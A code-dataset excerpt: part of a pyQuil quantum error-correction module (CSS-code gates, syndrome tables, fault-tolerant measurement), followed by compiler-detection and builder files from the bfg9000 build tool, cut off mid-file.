self._error_detect_z(loop_prog, block, ancilla, outcome, scratch, include_operators=True)
loop_prog += gates.IOR(flag, outcome)
prog += gates.MOVE(flag, 1)
prog.while_do(flag, loop_prog)
def apply_gate(self, prog: Program, gate_name: str, *blocks: CodeBlock):
pauli_prog = self._apply_pauli(gate_name, *blocks)
if pauli_prog is not None:
prog += pauli_prog
return
transversal_prog = self._apply_transversal(gate_name, *blocks)
if transversal_prog is not None:
prog += transversal_prog
return
universal_prog = self._apply_universal(gate_name, *blocks)
if universal_prog is not None:
prog += universal_prog
return
raise UnsupportedGateError("logical gate {} not implemented".format(gate_name))
def _apply_pauli(self, gate_name: str, *blocks: CodeBlock) -> Program:
if gate_name == 'I':
return Program()
operators = None
if gate_name == 'X':
operators = self.x_operators()
if gate_name == 'Y':
operators = self.y_operators()
if gate_name == 'Z':
operators = self.z_operators()
if operators is None:
return None
assert len(blocks) == 1
block = blocks[0]
# Only one logical qubit per code block.
pauli_term = operators[0]
assert pauli_term.coefficient == 1
return Program(gates.QUANTUM_GATES[pauli](block.qubits[q]) for q, pauli in pauli_term)
def _apply_transversal(self, gate_name: str, *blocks: CodeBlock) -> Program:
"""
Attempt to construct a program implementing the given gate transversally. If that cannot be
done with this type of code, then return None.
"""
if not self.is_transversal(gate_name):
return None
qubits = (block.qubits for block in blocks)
if gate_name == 'I':
return apply_transversally(gates.I, *qubits)
if gate_name == 'CNOT':
return apply_transversally(gates.CNOT, *qubits)
if gate_name == 'H':
return apply_transversally(gates.H, *qubits)
if gate_name == 'CZ':
return apply_transversally(gates.CZ, *qubits)
if gate_name == 'S':
return apply_transversally(
lambda qubit: [gates.Z(qubit), gates.S(qubit)], *qubits
)
raise NotImplementedError("transversal {} not implemented".format(gate_name))
def _apply_universal(self, gate_name, *blocks: List[QubitPlaceholder]) -> Program:
return None
def error_correct(self, prog: Program, data: CodeBlock,
ancilla_1: CodeBlock, ancilla_2: CodeBlock, scratch: MemoryChunk):
"""
Extend a Quil program to perform error correction.
"""
if data.n != self.n:
raise ValueError("data code word is of incorrect size")
if ancilla_1.n != self.n:
raise ValueError("ancilla_1 code word is of incorrect size")
if ancilla_2.n != self.n:
raise ValueError("ancilla_2 code word is of incorrect size")
if len(scratch) < self.error_correct_scratch_size:
raise ValueError("scratch buffer is too small")
# Split up the scratch buffer.
mem = scratch[:self.n]
correct_scratch = scratch[self.n:]
# See section 4.4 of "An Introduction to Quantum Error Correction and Fault-Tolerant Quantum
# Computation" by <NAME> for correction circuit.
# Propagate X errors from data block to ancilla block, then measure in the Z basis.
self.encode_plus(prog, ancilla_1, ancilla_2, scratch)
prog += apply_transversally(gates.CNOT, data.qubits, ancilla_1.qubits)
prog += (gates.MEASURE(ancilla_1.qubits[i], mem[i]) for i in range(self.n))
quil_classical_correct(prog, mem, data.x_errors, correct_scratch,
self.parity_check_c2, self._c2_syndromes)
# Propagate Z errors from data block to ancilla block, then measure in the X basis.
self.encode_zero(prog, ancilla_1, ancilla_2, scratch)
prog += apply_transversally(gates.CNOT, ancilla_1.qubits, data.qubits)
prog += apply_transversally(gates.H, ancilla_1.qubits)
prog += (gates.MEASURE(ancilla_1.qubits[i], mem[i]) for i in range(self.n))
quil_classical_correct(prog, mem, data.z_errors, correct_scratch,
self.parity_check_c1, self._c1_syndromes)
def _error_detect_x(self, prog: Program, data: CodeBlock, ancilla: CodeBlock,
outcome: MemoryReference, scratch: MemoryChunk, include_operators: bool):
"""
Extend a Quil program to perform detection of X errors on a data block. This uses noisy
preparation of the ancilla for measurement, meaning the procedure is not totally reliable.
"""
if len(scratch) < (self.n + self.r_2 + 2):
raise ValueError("scratch buffer is too small")
# Split up the scratch buffer.
mem = scratch[:self.n]
scratch = scratch[self.n:]
# Prepare a noisy ancilla. If measuring Z operators as well, prepare in Z eigenstate,
# otherwise prepare in X eigenstate.
ancilla.reset(prog)
if include_operators:
prog += self.noisy_encode_zero(ancilla.qubits)
else:
prog += self.noisy_encode_plus(ancilla.qubits)
# Propagate X errors from data block to ancilla block, then measure in the Z basis.
prog += apply_transversally(gates.CNOT, data.qubits, ancilla.qubits)
prog += (gates.MEASURE(ancilla.qubits[i], mem[i]) for i in range(self.n))
# Perform classical error detection with parity check matrix and maybe Z operators.
check_matrix = self.parity_check_c2
if include_operators:
check_matrix = np.concatenate([check_matrix, self.z_operator_matrix()], axis=0)
quil_classical_detect(prog, mem, data.x_errors, outcome, scratch, check_matrix)
def _error_detect_z(self, prog: Program, data: CodeBlock, ancilla: CodeBlock,
outcome: MemoryReference, scratch: MemoryChunk, include_operators: bool):
"""
Extend a Quil program to perform detection of Z errors on a data block. This uses noisy
preparation of the ancilla for measurement, meaning the procedure is not totally reliable.
"""
if len(scratch) < (self.n + self.r_1 + 2):
raise ValueError("scratch buffer is too small")
# Split up the scratch buffer.
mem = scratch[:self.n]
scratch = scratch[self.n:]
# Prepare a noisy ancilla. If measuring X operators as well, prepare in X eigenstate,
# otherwise prepare in Z eigenstate.
ancilla.reset(prog)
if include_operators:
prog += self.noisy_encode_plus(ancilla.qubits)
else:
prog += self.noisy_encode_zero(ancilla.qubits)
# Propagate Z errors from data block to ancilla block, then measure in the X basis.
prog += apply_transversally(gates.CNOT, ancilla.qubits, data.qubits)
prog += apply_transversally(gates.H, ancilla.qubits)
prog += (gates.MEASURE(ancilla.qubits[i], mem[i]) for i in range(self.n))
# Perform classical error detection with parity check matrix and maybe X operators.
check_matrix = self.parity_check_c1
if include_operators:
check_matrix = np.concatenate([check_matrix, self.x_operator_matrix()], axis=0)
quil_classical_detect(prog, mem, data.z_errors, outcome, scratch, check_matrix)
@property
def error_correct_scratch_size(self) -> int:
"""
Returns the minimum size of the scratch buffer required by error_correct.
"""
return self.encode_scratch_size
def measure(self, prog: Program, data: CodeBlock, index: int, outcome: MemoryReference,
ancilla_1: CodeBlock, ancilla_2: CodeBlock,
scratch: MemoryChunk, scratch_int: MemoryChunk):
"""
Extend a Quil program to measure the logical qubit in the Z basis. Ancilla must be in a
logical |0> state.
Index is the index of the logical qubit within the code block. Currently must be 0.
This measurement is made fault tolerant by repeating a noisy measurement 2t + 1 times and
returning a majority vote.
This yields control after each fault tolerant operation so that a round of error correction
may be performed globally if required.
"""
if index != 0:
raise ValueError("only one logical qubit per code block")
if data.n != self.n:
raise ValueError("data code word is of incorrect size")
if ancilla_1.n != self.n:
raise ValueError("ancilla_1 code word is of incorrect size")
if ancilla_2.n != self.n:
raise ValueError("ancilla_2 code word is of incorrect size")
if len(scratch) < self.measure_scratch_size:
raise ValueError("scratch buffer is too small")
if len(scratch_int) < 1:
raise ValueError("scratch_int buffer is too small")
trials = 2 * self.t + 1
# Split up the scratch buffer.
noisy_outcomes = scratch[:trials]
noisy_scratch = scratch[trials:]
for i in range(trials):
self.noisy_measure(prog, data, index, noisy_outcomes[i], ancilla_1, ancilla_2,
noisy_scratch)
yield
outcome_bit = noisy_scratch[0]
quil_classical.majority_vote(prog, noisy_outcomes, outcome_bit, scratch_int)
        # The QVM relies on MEASURE to initialize classical registers, so do a superfluous
        # measure here of the already-trashed ancilla.
prog += gates.MEASURE(ancilla_1.qubits[0], outcome)
# In case outcome is not a bit reference, do a CONVERT instead of a MOVE.
prog += gates.MOVE(outcome, outcome_bit)
@property
def measure_scratch_size(self) -> int:
return self.encode_scratch_size + 2 * self.t + 1
@property
def encode_scratch_size(self) -> int:
return 2 * self.n - max(self.r_1, self.r_2) + 4
def noisy_measure(self, prog: Program, data: CodeBlock, index: int, outcome: MemoryReference,
ancilla_1: CodeBlock, ancilla_2: CodeBlock, scratch: MemoryChunk):
"""
Extend a Quil program to measure the logical qubit in the Z basis. Ancilla must be in a
logical |0> state.
Index is the index of the logical qubit within the code block. Currently must be 0.
This measurement is not fault tolerant and may fail if any single operation fails.
"""
n, r_2 = self.n, self.r_2
if index != 0:
raise ValueError("only one logical qubit per code block")
if data.n != n:
raise ValueError("data code word is of incorrect size")
if ancilla_1.n != n:
raise ValueError("ancilla_1 code word is of incorrect size")
if ancilla_2.n != n:
raise ValueError("ancilla_2 code word is of incorrect size")
if len(scratch) < self.error_correct_scratch_size:
raise ValueError("scratch buffer is too small")
# Reset the ancilla to |0>.
self.encode_zero(prog, ancilla_1, ancilla_2, scratch)
# Split up the scratch buffer.
mem = scratch[:n]
scratch = scratch[n:(n + r_2 + 2)]
        # Propagate each Z in the operator from the data block to the ancilla block, then measure
        # in the Z basis.
#
# This implements the technique from section 3 of
# "Efficient fault-tolerant quantum computing" by <NAME>.
prog += apply_transversally(gates.CNOT, data.qubits, ancilla_1.qubits)
prog += (gates.MEASURE(ancilla_1.qubits[i], mem[i]) for i in range(self.n))
# Opportunistically correct any X errors.
quil_classical_correct(prog, mem, data.x_errors, scratch,
self.parity_check_c2, self._c2_syndromes)
# Finally, compute the measurement outcome.
z_operator = self.z_operator_matrix()[index:(index + 1), :]
outcome_chunk = MemoryChunk(
MemoryReference(outcome.name), outcome.offset, outcome.offset + 1
)
quil_classical.matmul(prog, z_operator, mem, outcome_chunk, scratch)
def quil_classical_correct(prog: Program, codeword: MemoryChunk, errors: MemoryChunk,
scratch: MemoryChunk, parity_check, syndromes):
"""
Extend a Quil program with instructions to correct a noisy classical codeword. Given a noisy
codeword and a vector of known existing errors, this attempts to identify the valid codeword
it decodes to. If such a correction is possible, this program updates the error vector with the
additional corrections required. If no such correction is possible because the number of errors
exceeds the unique decoding threshold, the errors vector is left unchanged.
"""
m, n = parity_check.shape
if len(codeword) != n:
raise ValueError("codeword is of incorrect size")
if len(errors) != n:
raise ValueError("errors is of incorrect size")
if len(scratch) < m + 2:
raise ValueError("scratch buffer is too small")
# Add in existing known errors to the noisy codeword.
prog += (gates.XOR(codeword[i], errors[i]) for i in range(n))
# Compute the syndrome by multiplying by the parity check matrix.
syndrome = scratch[2:m+2]
quil_classical.matmul(prog, parity_check, codeword, syndrome, scratch[:2])
# Revert codeword back to the state without error corrections.
prog += (gates.XOR(codeword[i], errors[i]) for i in range(n))
# Find the matching syndrome in the syndrome table and apply the correction.
for match_syndrome_key, correction in syndromes.items():
match_syndrome = bin_matrix.int_to_vec(match_syndrome_key, m)
matches = scratch[1:2]
quil_classical.string_match(prog, syndrome, match_syndrome, matches, scratch[:1])
quil_classical.conditional_xor(prog, errors, correction, matches, scratch[:1])
# Now correct codeword with updated corrections.
prog += (gates.XOR(codeword[i], errors[i]) for i in range(n))
def quil_classical_detect(prog: Program, codeword: MemoryChunk, errors: MemoryChunk,
outcome: MemoryReference, scratch: MemoryChunk, parity_check):
"""
Extend a Quil program with instructions to detect errors in a noisy classical codeword. Sets the
outcome bit if any errors are detected and unsets it otherwise.
"""
m, n = parity_check.shape
if len(codeword) != n:
raise ValueError("codeword is of incorrect size")
if len(errors) != n:
raise ValueError("errors is of incorrect size")
if len(scratch) < m + 2:
raise ValueError("scratch buffer is too small")
# Add in existing known errors to the noisy codeword.
prog += (gates.XOR(codeword[i], errors[i]) for i in range(n))
# Compute the syndrome by multiplying by the parity check matrix.
syndrome = scratch[2:m+2]
quil_classical.matmul(prog, parity_check, codeword, syndrome, scratch[:2])
# Revert codeword back to the state without error corrections.
prog += (gates.XOR(codeword[i], errors[i]) for i in range(n))
# Set outcome only if syndrome is non-zero.
prog += gates.MOVE(outcome, 0)
prog += (gates.IOR(outcome, syndrome[i]) for i in range(m))
def syndrome_table(parity_check):
"""
Given a parity check matrix of a binary linear code, determine the unique decoding threshold t
and return it along with a lookup table of syndromes to error terms of weight at most t. This
lookup table can be used to decode noisy codewords.
"""
_, n = parity_check.shape
table = {}
for w in range(n + 1):
# t_table is a table of syndromes produced by weight-t errors.
t_table = {}
for e in bin_matrix.weight_w_vectors(n, w):
syndrome = np.mod(np.matmul(parity_check, e), 2)
syndrome_int = bin_matrix.vec_to_int(syndrome)
if syndrome_int in table or syndrome_int in t_table:
return w - 1, table
t_table[syndrome_int] = e
# Merge t_table into table
table = {**table, **t_table}
return n, table
def transform_stabilisers(mat, prog):
_, n = mat.shape
for inst in prog.instructions:
if not isinstance(inst, Gate):
raise ValueError("program must only contain gates")
if any(not isinstance(qubit, Qubit) for qubit in inst.qubits):
raise ValueError("gate cannot have placeholders")
qubits = [qubit.index for qubit in inst.qubits]
if any(qubit >= n for qubit in qubits):
raise ValueError("qubit index must be within [0, n)")
if inst.name == 'H':
conjugate_h_with_check_mat(mat, *qubits)
elif inst.name == 'CNOT':
conjugate_cnot_with_check_mat(mat, *qubits)
else:
raise ValueError("cannot conjugate gate {}".format(inst.name))
def conjugate_h_with_check_mat(mat, qubit):
k, cols = mat.shape
n = cols // 2
q = qubit
for i in range(k):
if mat[i, q] == 1 and mat[i, n + q] == 1:
raise NotImplementedError("only handles CSS codes")
else:
# H switches X and Z paulis
mat[i, q], mat[i, n + q] = mat[i, n + q], mat[i, q]
def conjugate_cnot_with_check_mat(mat, control, target):
k, cols = mat.shape
n = cols // 2
c, t = control, target
for i in range(k):
# CNOT propagates X paulis from control to target
if mat[i, c] == 1:
mat[i, t] = (mat[i, t] + 1) % 2
# CNOT propagates Z paulis from target to control
if mat[i, n + t] == 1:
mat[i, n + c] = (mat[i, n + c] + 1) % 2
def swap_columns(mat, indices):
i, j = indices
mat[:,i], mat[:,j] = np.array(mat[:,j]), np.array(mat[:,i])
def pauli_term_for_row(x_check, z_check) -> PauliTerm:
"""
Determine the Pauli operator from a row in the check matrix.
See Nielsen & Chuang 10.5.1 for details.
"""
n = x_check.size
if not x_check.shape == (n,):
raise ValueError("x_check has the wrong dimensions")
if not z_check.shape == (n,):
raise ValueError("z_check has the wrong dimensions")
result = ID()
for i in range(n):
if x_check[i] and z_check[i]:
result *= sY(i)
elif x_check[i]:
result *= sX(i)
elif z_check[i]:
result *= sZ(i)
return result
def normalize_parity_check(h, offset):
r, n = h.shape
if n < offset + r:
raise ValueError("not enough columns")
qubit_swaps = []
for i in range(r):
        # Find a row at index i or later with a 1 in the i'th column past the offset.
row = next((j for j in range(i, r) if h[j, i + offset] % 2 == 1), None)
if row is not None:
            # Ensure row i has a 1 in the i'th column past the offset.
if h[i, i + offset] % 2 == 0:
h[i, :] += h[row, :]
else:
            # If no remaining rows have a 1 in the i'th column past the offset, then swap qubits.
col = next((j for j in range(i + offset, n) if h[i, j] % 2 == 1), None)
if col is None:
raise InvalidCodeError("rows are not independent")
qubit_swaps.append((i + offset, col))
swap_columns(h, qubit_swaps[-1])
# Ensure all other rows have a 0 in the i'th column.
for j in range(r):
if i != j and h[j, i + offset] % 2 == 1:
h[j, :] += h[i, :]
return np.mod(h, 2), qubit_swaps
def codes_equal(parity_check_1, parity_check_2) -> bool:
if parity_check_1.shape != parity_check_2.shape:
return False
return np.array_equal(
bin_matrix.reduced_row_echelon_form(parity_check_1),
bin_matrix.reduced_row_echelon_form(parity_check_2)
)
def is_doubly_even(mat):
"""
    Returns whether every row of the parity check matrix of a binary code has weight divisible
    by 4 (i.e., the code is doubly even).
"""
return not np.any(np.mod(np.sum(mat, axis=1), 4))
def apply_transversally(gate, *blocks) -> Program:
return Program(gate(*qubits) for qubits in zip(*blocks))
``` |
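The `syndrome_table` helper above drives the classical decoding in `quil_classical_correct`: it enumerates error vectors of increasing weight until two of them produce the same syndrome, which fixes the unique decoding threshold t. Below is a minimal, self-contained sketch of that construction for the [7,4] Hamming code, using plain numpy/itertools rather than the repo's `bin_matrix` helpers; the names here are illustrative only.

```python
import itertools
import numpy as np

# Parity check matrix of the [7,4] Hamming code (column j is j written in binary).
H = np.array([[0, 0, 0, 1, 1, 1, 1],
              [0, 1, 1, 0, 0, 1, 1],
              [1, 0, 1, 0, 1, 0, 1]])

def syndrome_lookup(parity_check):
    """Map each syndrome to a minimum-weight error, as syndrome_table does."""
    _, n = parity_check.shape
    table = {}
    for w in range(n + 1):
        t_table = {}
        for support in itertools.combinations(range(n), w):
            e = np.zeros(n, dtype=int)
            e[list(support)] = 1
            key = tuple(np.mod(parity_check @ e, 2))
            # A repeated syndrome means weight-w errors are no longer uniquely
            # decodable, so the threshold is w - 1.
            if key in table or key in t_table:
                return w - 1, table
            t_table[key] = e
        table.update(t_table)
    return n, table

t, table = syndrome_lookup(H)
assert t == 1 and len(table) == 8   # zero syndrome plus one entry per single-bit flip
```

For this code the loop stops at weight 2 (distinct single-bit errors already cover every nonzero syndrome), mirroring what `syndrome_table` returns for the same matrix.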
{
"source": "jimporter/bfg9000",
"score": 2
} |
#### File: tools/cc/__init__.py
```python
import os
import re
from itertools import chain
from .. import mopack, pkg_config
from ... import log, shell
from .compiler import CcCompiler, CcPchCompiler
from .linker import CcExecutableLinker, CcSharedLibraryLinker
from .rc import CcRcBuilder # noqa: F401
from ..ar import ArLinker
from ..common import Builder, check_which
from ..ld import LdLinker
from ...exceptions import PackageResolutionError
from ...iterutils import uniques
from ...languages import known_formats
from ...packages import PackageKind
from ...path import exists
from ...platforms import parse_triplet
from ...versioning import detect_version
class CcBuilder(Builder):
def __init__(self, env, langinfo, command, found, version_output):
brand, version, target_flags = self._parse_brand(env, command,
version_output)
super().__init__(langinfo.name, brand, version)
self.object_format = env.target_platform.object_format
name = langinfo.var('compiler').lower()
ldinfo = known_formats['native']['dynamic']
arinfo = known_formats['native']['static']
# Try to infer the appropriate -fuse-ld option from the LD environment
# variable.
link_command = command[:]
ld_command = env.getvar(ldinfo.var('linker'))
if ld_command:
tail = os.path.splitext(ld_command)[1][1:]
if tail in ['bfd', 'gold']:
log.info('setting `-fuse-ld={}` for `{}`'
.format(tail, shell.join(command)))
link_command.append('-fuse-ld={}'.format(tail))
cflags_name = langinfo.var('flags').lower()
cflags = (target_flags +
shell.split(env.getvar('CPPFLAGS', '')) +
shell.split(env.getvar(langinfo.var('flags'), '')))
ldflags_name = ldinfo.var('flags').lower()
ldflags = (target_flags +
shell.split(env.getvar(ldinfo.var('flags'), '')))
ldlibs_name = ldinfo.var('libs').lower()
ldlibs = shell.split(env.getvar(ldinfo.var('libs'), ''))
ar_name = arinfo.var('linker').lower()
ar_which = check_which(env.getvar(arinfo.var('linker'), 'ar'),
env.variables, kind='static linker')
arflags_name = arinfo.var('flags').lower()
arflags = shell.split(env.getvar(arinfo.var('flags'), 'cr'))
# macOS's ld doesn't support --version, but we can still try it out and
# grab the command line.
ld_command = None
try:
stdout, stderr = env.execute(
command + ldflags + ['-v', '-Wl,--version'],
stdout=shell.Mode.pipe, stderr=shell.Mode.pipe,
returncode='any'
)
for line in stderr.split('\n'):
if '--version' in line:
ld_command = shell.split(line)[0:1]
if os.path.basename(ld_command[0]) != 'collect2':
break
except (OSError, shell.CalledProcessError):
pass
compile_kwargs = {'command': (name, command, found),
'flags': (cflags_name, cflags)}
self.compiler = CcCompiler(self, env, **compile_kwargs)
try:
self.pch_compiler = CcPchCompiler(self, env, **compile_kwargs)
except ValueError:
self.pch_compiler = None
link_kwargs = {'command': (name, link_command, found),
'flags': (ldflags_name, ldflags),
'libs': (ldlibs_name, ldlibs)}
self._linkers = {
'executable': CcExecutableLinker(self, env, **link_kwargs),
'shared_library': CcSharedLibraryLinker(self, env, **link_kwargs),
'static_library': ArLinker(
self, env, command=(ar_name,) + ar_which,
flags=(arflags_name, arflags)
),
}
if ld_command:
self._linkers['raw'] = LdLinker(self, env, ld_command, stdout)
self.packages = CcPackageResolver(self, env, command, ldflags)
self.runner = None
@classmethod
def _parse_brand(cls, env, command, version_output):
target_flags = []
if 'Free Software Foundation' in version_output:
brand = 'gcc'
version = detect_version(version_output)
if env.is_cross:
triplet = parse_triplet(env.execute(
command + ['-dumpmachine'],
stdout=shell.Mode.pipe, stderr=shell.Mode.devnull
).rstrip())
target_flags = cls._gcc_arch_flags(
env.target_platform.arch, triplet.arch
)
elif 'clang' in version_output:
brand = 'clang'
version = detect_version(version_output)
if env.is_cross:
target_flags = ['-target', env.target_platform.triplet]
else:
brand = 'unknown'
version = None
return brand, version, target_flags
@staticmethod
def _gcc_arch_flags(arch, native_arch):
if arch == native_arch:
return []
elif arch == 'x86_64':
return ['-m64']
elif re.match(r'i.86$', arch):
return ['-m32'] if not re.match(r'i.86$', native_arch) else []
return []
@staticmethod
def check_command(env, command):
return env.execute(command + ['--version'], stdout=shell.Mode.pipe,
stderr=shell.Mode.devnull)
@property
def flavor(self):
return 'cc'
@property
def family(self):
return 'native'
@property
def auto_link(self):
return False
@property
def can_dual_link(self):
return True
def linker(self, mode):
return self._linkers[mode]
class CcPackageResolver:
def __init__(self, builder, env, command, ldflags):
self.builder = builder
self.env = env
self.include_dirs = [i for i in uniques(chain(
self.builder.compiler.search_dirs(),
self.env.host_platform.include_dirs
)) if exists(i)]
cc_lib_dirs = self.builder.linker('executable').search_dirs()
try:
sysroot = self.builder.linker('executable').sysroot()
ld_lib_dirs = self.builder.linker('raw').search_dirs(sysroot, True)
except (KeyError, OSError, shell.CalledProcessError):
ld_lib_dirs = self.env.host_platform.lib_dirs
self.lib_dirs = [i for i in uniques(chain(
cc_lib_dirs, ld_lib_dirs, self.env.host_platform.lib_dirs
)) if exists(i)]
@property
def lang(self):
return self.builder.lang
def _lib_names(self, kind):
names = []
if kind & PackageKind.shared:
base = 'lib{}' + self.env.target_platform.shared_library_ext
if self.env.target_platform.has_import_library:
names.append(base + '.a')
else:
names.append(base)
if kind & PackageKind.static:
names.append('lib{}.a')
# XXX: Include Cygwin here too?
if self.env.target_platform.family == 'windows':
# We don't actually know what kind of library this is. It could be
# a static library or an import library (which we classify as a
# kind of shared lib).
names.append('{}.lib')
return names
# TODO: Remove headers/libs from arguments after 0.7 is released.
def resolve(self, name, submodules, version, kind, *, headers=None,
libs=None, system=True):
format = self.builder.object_format
usage = mopack.get_usage(self.env, name, submodules, self.include_dirs,
self.lib_dirs, self._lib_names(kind))
if usage.get('auto_link', False):
raise PackageResolutionError('package {!r} requires auto-link'
.format(name))
# XXX: Add headers/libs here somehow? Add them into PkgConfigPackage
# directly?
return pkg_config.resolve(
self.env, name, submodules, version, usage['pcfiles'],
format=format, kind=kind, system=system, search_path=usage['path'],
extra_options=usage.get('extra_args', []),
generated=usage.get('generated', False)
)
```
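The `-fuse-ld` inference in `CcBuilder.__init__` above only inspects the extension of the `LD` environment variable. A hedged, standalone sketch of that check (the helper name is invented for illustration; it is not bfg9000's API):

```python
import os

def infer_fuse_ld(command, ld_command):
    """Append -fuse-ld=<flavor> when LD points at ld.bfd or ld.gold."""
    link_command = command[:]
    if ld_command:
        tail = os.path.splitext(ld_command)[1][1:]   # e.g. 'ld.gold' -> 'gold'
        if tail in ('bfd', 'gold'):
            link_command.append('-fuse-ld={}'.format(tail))
    return link_command

assert infer_fuse_ld(['cc'], 'ld.gold') == ['cc', '-fuse-ld=gold']
assert infer_fuse_ld(['cc'], '/usr/bin/ld') == ['cc']
```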
#### File: bfg9000/tools/c_family.py
```python
from collections import namedtuple
from . import builder, cc, msvc
from .. import log
from .common import choose_builder, make_command_converter_pair
from ..languages import known_formats, known_langs
_guessed_info = namedtuple('_guessed_info', ['lang', 'cmd', 'guessed_cmd'])
with known_langs.make('c') as x:
x.vars(compiler='CC', flags='CFLAGS')
x.exts(source=['.c'], header=['.h'])
with known_langs.make('c++') as x:
x.vars(compiler='CXX', flags='CXXFLAGS')
x.exts(source=['.cpp', '.cc', '.cp', '.cxx', '.CPP', '.c++', '.C'],
header=['.hpp', '.hh', '.hp', '.hxx', '.HPP', '.h++', '.H'])
x.auxexts(header=['.h'])
with known_langs.make('objc') as x:
x.vars(compiler='OBJC', flags='OBJCFLAGS')
x.exts(source=['.m'])
x.auxexts(header=['.h'])
with known_langs.make('objc++') as x:
x.vars(compiler='OBJCXX', flags='OBJCXXFLAGS')
x.exts(source=['.mm', '.M'])
x.auxexts(header=['.h'])
with known_formats.make('native', src_lang='c') as fmt:
with fmt.make('dynamic') as x:
x.vars(linker='LD', flags='LDFLAGS', libs='LDLIBS')
with fmt.make('static') as x:
x.vars(linker='AR', flags='ARFLAGS')
_c_to_cxx, _cxx_to_c = make_command_converter_pair([
# These are ordered from most- to least-specific; in particular, we want
# `clang-cl` to stay that way when converted between C and C++ contexts.
('clang-cl', 'clang-cl'),
('cc', 'c++'),
('gcc', 'g++'),
('clang', 'clang++'),
('cl', 'cl'),
])
_siblings = {
'c' : ['objc', 'c++', 'objc++'],
'c++' : ['objc++', 'c', 'objc'],
'objc' : ['c', 'objc++', 'c++'],
'objc++': ['c++', 'objc', 'c'],
}
_posix_cmds = {
'c' : ['cc'],
'c++' : ['c++'],
'objc' : ['cc'],
'objc++': ['c++'],
}
_windows_cmds = {
'c' : ['cl', 'clang-cl', 'cc', 'gcc', 'clang'],
'c++' : ['cl', 'clang-cl', 'c++', 'g++', 'clang++'],
'objc' : ['cc', 'gcc', 'clang'],
'objc++': ['c++', 'g++', 'clang++'],
}
_builders = (msvc.MsvcBuilder, cc.CcBuilder)
_fallback_posix_builder = cc.CcBuilder
_fallback_windows_builder = msvc.MsvcBuilder
def _guess_candidates(env, lang):
def is_cxx_based(lang):
return lang.endswith('c++')
candidates = []
cxx_based = is_cxx_based(lang)
for i in _siblings[lang]:
cmd = sibling_cmd = env.getvar(known_langs[i].var('compiler'))
if sibling_cmd is not None:
sibling_cxx_based = is_cxx_based(i)
if cxx_based and not sibling_cxx_based:
cmd = _c_to_cxx(cmd)
elif not cxx_based and sibling_cxx_based:
cmd = _cxx_to_c(cmd)
if cmd is not None:
candidates.append(_guessed_info(i, sibling_cmd, cmd))
return candidates
@builder('c', 'c++', 'objc', 'objc++')
def c_family_builder(env, lang):
if env.host_platform.family == 'windows':
candidates = _windows_cmds[lang]
fallback = _fallback_windows_builder
else:
candidates = _posix_cmds[lang]
fallback = _fallback_posix_builder
langinfo = known_langs[lang]
cmd = env.getvar(langinfo.var('compiler'))
if cmd:
return choose_builder(env, langinfo, _builders, candidates=cmd,
fallback_builder=fallback)
# We don't have an explicitly-set command from the environment, so try to
# guess what the right command would be.
guessed_info = _guess_candidates(env, lang)
# If the last guessed command is the same as the first default command
# candidate, remove it. This will keep us from logging a useless info
# message that we guessed the default value for the command.
if guessed_info and guessed_info[-1].guessed_cmd == candidates[0]:
del guessed_info[-1]
for sibling_lang, sibling_cmd, guessed_cmd in guessed_info:
try:
builder = choose_builder(env, langinfo, _builders,
candidates=guessed_cmd,
fallback_builder=fallback, strict=True)
log.info('guessed {} compiler {!r} from {} compiler {!r}'.format(
lang, guessed_cmd, sibling_lang, sibling_cmd
))
return builder
except IOError:
pass
# Try all the default command candidates we haven't already tried above.
guesses = [i.guessed_cmd for i in guessed_info]
untried_candidates = [i for i in candidates if i not in guesses]
return choose_builder(env, langinfo, _builders,
candidates=untried_candidates,
fallback_builder=fallback)
```
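The guessing logic above derives one language's compiler command from a sibling language's setting, e.g. guessing a C++ compiler when only `CC` is set. The real conversion is built by `make_command_converter_pair`; the following is only a rough sketch of the idea using naive substring replacement (ordering adjusted so longer names are tried before their substrings), with invented names:

```python
_c_to_cxx_names = [
    ('clang-cl', 'clang-cl'),   # clang-cl drives both languages
    ('clang', 'clang++'),
    ('gcc', 'g++'),
    ('cc', 'c++'),
    ('cl', 'cl'),
]

def guess_cxx_from_cc(cmd):
    """Derive a plausible C++ compiler command from a C compiler command."""
    for c_name, cxx_name in _c_to_cxx_names:
        if c_name in cmd:
            return cmd.replace(c_name, cxx_name, 1)
    return None

assert guess_cxx_from_cc('gcc-12') == 'g++-12'
assert guess_cxx_from_cc('x86_64-w64-mingw32-gcc') == 'x86_64-w64-mingw32-g++'
assert guess_cxx_from_cc('clang-cl') == 'clang-cl'
```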
#### File: tools/msvc/__init__.py
```python
import os.path
from itertools import chain
from .. import mopack, pkg_config
from ... import shell
from .compiler import MsvcCompiler, MsvcPchCompiler
from .linker import (MsvcExecutableLinker, MsvcSharedLibraryLinker,
MsvcStaticLinker)
from .rc import MsvcRcBuilder # noqa: F401
from ..common import Builder, check_which
from ...iterutils import uniques
from ...languages import known_formats
from ...path import exists
from ...versioning import detect_version
class MsvcBuilder(Builder):
def __init__(self, env, langinfo, command, found, version_output):
brand, version = self._parse_brand(env, command, version_output)
super().__init__(langinfo.name, brand, version)
self.object_format = env.target_platform.object_format
name = langinfo.var('compiler').lower()
ldinfo = known_formats['native']['dynamic']
arinfo = known_formats['native']['static']
# Look for the last argument that looks like our compiler and use its
# directory as the base directory to find the linkers.
origin = ''
for i in reversed(command):
if os.path.basename(i) in ('cl', 'cl.exe'):
origin = os.path.dirname(i)
link_which = check_which(
env.getvar(ldinfo.var('linker'), os.path.join(origin, 'link')),
env.variables, kind='{} dynamic linker'.format(self.lang)
)
lib_which = check_which(
env.getvar(arinfo.var('linker'), os.path.join(origin, 'lib')),
env.variables, kind='{} static linker'.format(self.lang)
)
cflags_name = langinfo.var('flags').lower()
cflags = (
shell.split(env.getvar('CPPFLAGS', '')) +
shell.split(env.getvar(langinfo.var('flags'), ''))
)
ld_name = ldinfo.var('linker').lower()
ldflags_name = ldinfo.var('flags').lower()
ldflags = shell.split(env.getvar(ldinfo.var('flags'), ''))
ldlibs_name = ldinfo.var('libs').lower()
ldlibs = shell.split(env.getvar(ldinfo.var('libs'), ''))
ar_name = arinfo.var('linker').lower()
arflags_name = arinfo.var('flags').lower()
arflags = shell.split(env.getvar(arinfo.var('flags'), ''))
compile_kwargs = {'command': (name, command, found),
'flags': (cflags_name, cflags)}
self.compiler = MsvcCompiler(self, env, **compile_kwargs)
self.pch_compiler = MsvcPchCompiler(self, env, **compile_kwargs)
link_kwargs = {'command': (ld_name,) + link_which,
'flags': (ldflags_name, ldflags),
'libs': (ldlibs_name, ldlibs)}
self._linkers = {
'executable': MsvcExecutableLinker(self, env, name, **link_kwargs),
'shared_library': MsvcSharedLibraryLinker(self, env, name,
**link_kwargs),
'static_library': MsvcStaticLinker(
